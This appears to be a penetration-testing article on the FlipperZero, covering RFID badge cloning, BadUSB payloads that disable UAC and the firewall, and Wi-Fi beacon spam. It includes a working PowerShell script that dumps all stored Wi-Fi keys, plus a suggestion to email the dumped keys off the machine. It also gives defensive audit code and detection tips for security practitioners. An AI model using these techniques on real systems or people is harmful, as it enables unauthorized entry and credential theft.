Introduced through a 2020 Kickstarter campaign that sought $60K (a goal it exceeded many times over), with devices becoming widely available in 2022, the FlipperZero has taken the security world by storm, producing dozens of YouTube videos, write-ups, GitHub repos, and derivative products that extend its capabilities.
Hailed as a 'Swiss Army knife for geeks and pentesters,' this handy little multi-tool might be what's missing in your approach to physical and wireless security testing. Capable of assessing and compromising a broad spectrum of radio and wireless signals, this tool, developed by Pavel Zhovner's Flipper Devices, performs a wide variety of security tasks that have not been commercially possible in a platform of this size until now.
From a cybersecurity perspective, the FlipperZero excels at cloning and replaying access badges, capturing, replaying, or abusing wireless signals, and using keystroke-injection (BadUSB) scripts to attack enterprise devices such as laptops, while its Wi-Fi add-on targets wireless clients and access points. The infographic below summarizes the core technologies the FlipperZero is capable of interacting with or potentially abusing.
The FlipperZero firmware is open-source and highly extensible, allowing users to add or expand the core platform features and drastically increasing the device's effectiveness. Several community forks of the stock firmware are available on GitHub, including the Unleashed edition (published under the DarkFlippers organization, whose name is sometimes used loosely for all of these forks), RogueMaster, and Xtreme.
Flashing third-party firmware onto a FlipperZero may void the warranty or break the functionality and usability of the device. Anyone choosing to do so should back up the device first (qFlipper can create a full backup) before attempting a firmware upgrade or modification. This article explores high-level examples of how a FlipperZero can aid physical and wireless penetration testing exercises using the Xtreme (aka ClaraCrazy) firmware edition, paired with the Wi-Fi Developer Board running the ESP32 Marauder firmware.
The FlipperZero also provides numerous management options via a mobile application and the qFlipper desktop application, which ease administration of the platform. While the base device boots without one, a microSD card is needed for most of what follows: it holds the Flipper's signal databases, saved captures, and BadUSB scripts.
The FlipperZero can fit into penetration testing exercises in a variety of ways. While the device can assess or manipulate wireless traffic from a distance, it excels at close-range interactions such as script execution via USB, credential theft, and brute-forcing devices such as safes, badge readers, or garage door openers.
The infographic below suggests one of many approaches by which the FlipperZero could obtain access to a client facility or evaluate other aspects of physical and wireless security. The FlipperZero must typically be within a few centimeters of an access badge or other RFID/NFC authenticator for reading and cloning to succeed. That short read range is easily defeated by RFID-shielding sleeves, by badges buried under a few layers of clothing, and by badges carried inside a wallet or purse.
The article now shifts to pointed examples of using a FlipperZero directly and effectively, starting with badge cloning, followed by BadUSB script examples and the Wi-Fi Marauder application for wireless assessments. Badge cloning is straightforward when access badges are left unattended (this happens more often than you would expect), hang loosely on a lanyard, or can be reached through a single layer of an individual's clothing. From the 125 kHz RFID menu, select "Read" and hold the Flipper's antenna over the card, as depicted in the image below. The 125 kHz menu covers low-frequency credentials (EM4100, HID Prox, Indala) that simply broadcast a static ID with no authentication, which is exactly why they clone so easily; 13.56 MHz cards are handled from the NFC menu, and whether they can be cloned depends on the card type and how its keys are protected.
Once a badge is read and saved, the "Emulate" feature replays the cloned credential at any reader, granting the holder the same access as the original. A replayed low-frequency credential carries exactly the same ID as the original, so the access-control system logs it as the legitimate badge holder, and a tester carrying several cloned badges can masquerade as several employees. Badge cloning is far less effective against credentials that authenticate cryptographically between card and reader (for example MIFARE DESFire or HID SEOS rather than legacy Prox), against RFID-shielding sleeves for employee badges, and where employees have been trained on the proper use and storage of access badges.
BadUSB is one of the more thrilling features of the FlipperZero because of its versatility: the device enumerates as a USB keyboard and types DuckyScript payloads, performing a variety of traditional pentesting techniques through keystroke injection. Numerous GitHub repositories provide field-tested BadUSB scripts out of the box; notable ones include Hak5, FalsePhilosopher, UNC0V3R3D, and I-Am-Jakoby. BadUSB will not typically succeed in mature environments that enforce User Account Control (UAC) through Group Policy, lock unattended sessions, restrict USB device installation (blocking unknown HID-class devices defeats keystroke injection outright), and run strong endpoint protection such as Windows Defender or CrowdStrike Falcon; many organizations, however, remain surprisingly lax on these points.
This article assumes a scenario in which an unattended, logged-in administrator PC is discovered and several BadUSB scripts are executed against it, succeeding in disabling key security features such as the Windows Firewall and UAC notifications and in stealing all Wi-Fi keys stored on the device. Other BadUSB scripts are available that download and run Mimikatz to dump the SAM database, open reverse shells with Netcat, and install backdoors via registry keys or additional administrator accounts.
BadUSB scripts are accessed, added, or modified in the BadUSB folder on the microSD card, as shown below. Penetration testers and malicious actors often attempt to disable or circumvent endpoint controls before moving laterally or escalating privileges, and several BadUSB scripts on a FlipperZero help realize these goals. Starting with the "disable_uac" script, the FlipperZero can suppress the prompts shown to the user when applications modify computer settings or install software.
A BadUSB script is executed by attaching the FlipperZero to the target machine via USB, navigating to the BadUSB menu, selecting the script of choice, and pressing the center button to run it. Before execution of the "disable_uac" script, UAC on the target machine sits at the top-most "Always Notify" setting; after execution it sits at "Never Notify." Note that changing UAC settings itself requires administrative rights, so the script depends on the unattended session belonging to a local administrator.
Next, the "disable_firewall" BadUSB script is executed, turning off the Windows Firewall profiles that help block network-borne attacks and unwanted inbound connections.
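The two payloads above leave a measurable trace in the registry and in the firewall profile state. The following PowerShell is an added example for this article (not a script from the Flipper project or any of the BadUSB repositories named above): it audits the UAC policy values and firewall profiles that "disable_uac" and "disable_firewall" style scripts change, and reverts them. The registry path and value names are Microsoft's documented UAC policy values; the function names and the wording of the findings are assumptions of this example. Run it from an elevated PowerShell on Windows 10/11.

```powershell
# Added example: audit and revert the host state left behind by UAC- and
# firewall-disabling BadUSB payloads. Not a script from the Flipper project
# or any BadUSB repository; function names are this example's own.

$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacValue {
    # Read one UAC policy value, falling back to the stock Windows default if
    # the value is absent (a stock install has all three present).
    param([string]$Name, [int]$Default)
    $v = (Get-ItemProperty -Path $UacKey -Name $Name -ErrorAction SilentlyContinue).$Name
    if ($null -eq $v) { $Default } else { [int]$v }
}

function Get-UacState {
    # The three values together encode the UAC slider position:
    #   Always notify : ConsentPromptBehaviorAdmin=2, PromptOnSecureDesktop=1
    #   Default       : ConsentPromptBehaviorAdmin=5, PromptOnSecureDesktop=1
    #   Never notify  : ConsentPromptBehaviorAdmin=0, PromptOnSecureDesktop=0
    #   EnableLUA=0 switches UAC off entirely after the next reboot.
    [pscustomobject]@{
        EnableLUA                  = Get-UacValue -Name 'EnableLUA' -Default 1
        ConsentPromptBehaviorAdmin = Get-UacValue -Name 'ConsentPromptBehaviorAdmin' -Default 5
        PromptOnSecureDesktop      = Get-UacValue -Name 'PromptOnSecureDesktop' -Default 1
    }
}

function Test-UacWeakened {
    param([Parameter(Mandatory)]$State)
    $findings = @()
    if ($State.EnableLUA -eq 0) {
        $findings += 'EnableLUA=0: UAC disabled (effective after reboot)'
    }
    if ($State.ConsentPromptBehaviorAdmin -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin=0: administrators elevate with no prompt'
    }
    if ($State.PromptOnSecureDesktop -eq 0) {
        $findings += 'PromptOnSecureDesktop=0: elevation prompts shown on the normal desktop'
    }
    $findings
}

function Get-FirewallFindings {
    # Get-NetFirewallProfile ships with the NetSecurity module (Windows 8 / Server 2012 and later).
    Get-NetFirewallProfile |
        Where-Object { $_.Enabled -eq 'False' } |
        ForEach-Object { "Windows Firewall profile '$($_.Name)' is disabled" }
}

function Restore-Defaults {
    # Reverse what the two payloads did: default UAC slider, all firewall profiles on.
    Set-ItemProperty -Path $UacKey -Name 'EnableLUA' -Value 1 -Type DWord
    Set-ItemProperty -Path $UacKey -Name 'ConsentPromptBehaviorAdmin' -Value 5 -Type DWord
    Set-ItemProperty -Path $UacKey -Name 'PromptOnSecureDesktop' -Value 1 -Type DWord
    Set-NetFirewallProfile -All -Enabled True
}

$findings = @(Test-UacWeakened -State (Get-UacState)) + @(Get-FirewallFindings)
if ($findings.Count -eq 0) {
    'No UAC or firewall tampering detected'
} else {
    $findings
    'Run Restore-Defaults to revert'
}
```

Because the payloads write to HKLM, the same three values can also be watched centrally: a registry-modification rule on that key (for example Sysmon Event ID 13) fires the moment a typed `reg add` lands, which is usually faster than waiting for a configuration audit.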
The next BadUSB script is a little more advanced in its execution. Where "disable_uac" and "disable_firewall" rely on simple keystroke injection (DuckyScript STRING lines and key presses) to achieve their outcomes, the "Wifi-Stealer_ORG" script types a short series of PowerShell commands that enumerate every saved SSID and its stored Wi-Fi key, separate the data into distinct files, and place them on the target machine's desktop for extraction.
The files can be emailed off the target computer using additional 'Send-MailMessage' PowerShell cmdlets, or stored in a less obvious location by altering the file path in the existing script. An example output file is shown below, revealing valid Wi-Fi keys that an attacker could abuse at leisure.
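To make the harvesting step concrete, here is an added example written for this article (it is not the Wifi-Stealer_ORG script itself) of the PowerShell logic a BadUSB payload types into a console. Windows hands the stored pre-shared key of any machine-wide WLAN profile to a local administrator via `netsh wlan show profile ... key=clear`; the code below enumerates the profiles and collects each key. The regular expressions assume English netsh output (other locales translate the "All User Profile" and "Key Content" labels), and the output path is an assumption that mirrors the "file on the desktop" behaviour described above.

```powershell
# Added example: enumerate saved WLAN profiles and their stored keys via netsh.
# Not the Wifi-Stealer_ORG script; function names and output path are this
# example's own. Requires local administrator rights for machine-wide profiles.

function Get-WlanProfileNames {
    # Profile lines look like: "    All User Profile     : CorpGuest"
    netsh wlan show profiles |
        ForEach-Object { if ($_ -match '^\s*All User Profile\s*:\s*(.+?)\s*$') { $Matches[1] } }
}

function Get-WlanKey {
    param([Parameter(Mandatory)][string]$Name)
    # key=clear makes netsh decrypt the stored PSK; open networks have no "Key Content" line.
    # name="$Name" keeps SSIDs containing spaces as a single argument.
    $out  = netsh wlan show profile name="$Name" key=clear
    $auth = $out | Select-String '^\s*Authentication\s*:\s*(.+?)\s*$' | Select-Object -First 1
    $key  = $out | Select-String '^\s*Key Content\s*:\s*(.+?)\s*$'    | Select-Object -First 1
    $authText = if ($auth) { $auth.Matches[0].Groups[1].Value } else { 'unknown' }
    $keyText  = if ($key)  { $key.Matches[0].Groups[1].Value }  else { '' }  # empty: open network or no stored key
    [pscustomobject]@{ SSID = $Name; Auth = $authText; Key = $keyText }
}

function Export-WlanKeys {
    # Collects every profile, writes a CSV, and returns the rows for interactive inspection.
    param([string]$Path = (Join-Path $env:USERPROFILE 'Desktop\wifi_keys.csv'))
    $rows = @(Get-WlanProfileNames | ForEach-Object { Get-WlanKey -Name $_ })
    $rows | Export-Csv -Path $Path -NoTypeInformation -Encoding UTF8
    $rows
}

Export-WlanKeys | Format-Table -AutoSize
```

From the defensive side, the interesting signal is a `netsh.exe` process created with `key=clear` on its command line shortly after a new keyboard-class USB device is attached; Sysmon process-creation events (Event ID 1) or Windows Security event 4688 with command-line auditing enabled both capture it.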
Another exciting and highly flexible capability of the FlipperZero is conducting Wi-Fi-focused assessments with the Wi-Fi Developer Board, an ESP32-S2 add-on that attaches to the Flipper's GPIO header. After flashing the ESP32 Marauder firmware onto the board, the FlipperZero becomes a capable Wi-Fi testing platform. Marauder allows the FlipperZero to identify in-range wireless networks, examine connected clients, perform probe and beacon attacks, and de-authenticate wireless clients, providing much of the capability found in traditional Wi-Fi assessment tools such as Aircrack-ng. Keep in mind that the ESP32-S2 radio is 2.4 GHz only, so 5 GHz networks and clients are invisible to it.
The example below demonstrates identifying wireless networks, selecting a network for assessment, and performing a "RickRoll" attack. The first step involves opening the "Wi-Fi Marauder" GPIO application, scanning for Wi-Fi access points, selecting a target network, and then flooding the air with beacon frames advertising fake networks named after lyrics from "Never Gonna Give You Up" by Rick Astley. Beacon spam of this kind demonstrates how easily rogue SSIDs can be advertised alongside the corporate network, the first step toward 'Evil Twin' and Adversary-in-the-Middle attacks when combined with client de-authentication, and will hopefully prompt employees to report suspicious network activity. Note that de-authentication attacks are blunted on networks enforcing 802.11w Protected Management Frames, which WPA3 makes mandatory.
This article has merely scratched the surface of what a FlipperZero can do from a signal-analysis and security-assessment perspective. Several competing products offer similar features, but many focus on a narrower set of capabilities, cost more, and lack the flexibility to modify the firmware or extend the device. The article purposely showcased modest examples of how a FlipperZero can augment the approach and toolset used during a security assessment, aiming to pique the reader's curiosity to adapt its many applications in future testing. The only way a device as small and unobtrusive as a FlipperZero could be improved is if a fully-fledged penetration testing system like Kali Linux or ParrotOS also shipped onboard.
As it happens, Flipper Devices Inc. already appears to be hard at work scratching that itch with the FlipperOne, which is currently under development.